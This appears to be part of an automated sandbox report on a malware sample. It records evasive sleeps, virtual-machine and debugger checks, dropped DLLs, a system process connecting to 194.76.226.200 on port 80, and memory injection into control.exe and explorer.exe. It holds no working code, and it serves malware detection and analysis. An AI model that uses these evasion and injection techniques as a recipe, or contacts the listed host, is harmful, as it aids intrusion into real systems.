Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -1773297476s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 1682 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 2348 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 818 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -157056s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 698 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -268032s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 853 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -81888s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 446 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 2353 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep time: -56472s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392	Thread sleep count: 784 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440	Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452	Thread sleep count: 161 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep count: 2449 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752	Thread sleep count: 84 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4972	Thread sleep count: 5209 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4964	Thread sleep count: 1051 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552	Thread sleep time: -922337203685477s >= -30000s

Found evasive API chain (date check)

Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pqvogmwc.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0hsihch1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sjfy431f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oeprcmty.dll	Jump to dropped file

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 1682	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 2348	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 818	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 698	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 853	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 446	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 2353	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 784	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 386	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 467	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 878	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2449
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1051

Found evasive API chain checking for process token information

Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 5.7 %

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_046CB190
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_046CB2F7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_046DD39D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04BCB190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_04BCB2F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_04BDD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	4_2_05EAB190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	4_2_05EBD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	4_2_05EAB2F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	5_2_0511B190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	5_2_0512D39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	5_2_0511B2F7

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\loaddll32.exe

1_2_046DFD82

Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: rundll32.exe, 00000005.00000003.356861693.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.495341507.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.370066719.0000000003382000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.494533475.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.496800604.000000000337F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359830510.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWntVersion\Internet Settings~~
Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: loaddll32.exe, 00000001.00000003.492686676.0000000001342000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.508275635.0000000001347000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.370406857.0000000001332000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493122796.0000000001310000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.511408070.0000000001343000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.489086905.000000000133A000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.488421383.0000000001331000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493342130.0000000001346000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(^8
Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_046D653E

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0CE8 mov eax, dword ptr fs:[00000030h]	1_2_00DC0CE8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0C57 mov eax, dword ptr fs:[00000030h]	1_2_00DC0C57
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0A64 mov eax, dword ptr fs:[00000030h]	1_2_00DC0A64
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0BFC mov eax, dword ptr fs:[00000030h]	1_2_00DC0BFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00DC0B14 mov eax, dword ptr fs:[00000030h]	1_2_00DC0B14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120C57 mov eax, dword ptr fs:[00000030h]	4_2_01120C57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120B14 mov eax, dword ptr fs:[00000030h]	4_2_01120B14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120BFC mov eax, dword ptr fs:[00000030h]	4_2_01120BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120A64 mov eax, dword ptr fs:[00000030h]	4_2_01120A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01120CE8 mov eax, dword ptr fs:[00000030h]	4_2_01120CE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0CE8 mov eax, dword ptr fs:[00000030h]	5_2_00EB0CE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0A64 mov eax, dword ptr fs:[00000030h]	5_2_00EB0A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0C57 mov eax, dword ptr fs:[00000030h]	5_2_00EB0C57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0BFC mov eax, dword ptr fs:[00000030h]	5_2_00EB0BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00EB0B14 mov eax, dword ptr fs:[00000030h]	5_2_00EB0B14

Checks if the current process is being debugged

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046C8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	1_2_046C8C50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BC8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	3_2_04BC8C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EA8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	4_2_05EA8C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05118C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,	5_2_05118C50

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 194.76.226.200 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 220000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: CE0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 956000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2D60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 954000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2B60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2B50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 942000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AC0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 93E000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 2BA0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 93C000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: D70000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 220000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\System32\control.exe base: CE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 2BA0000 protect: page execute and read and write
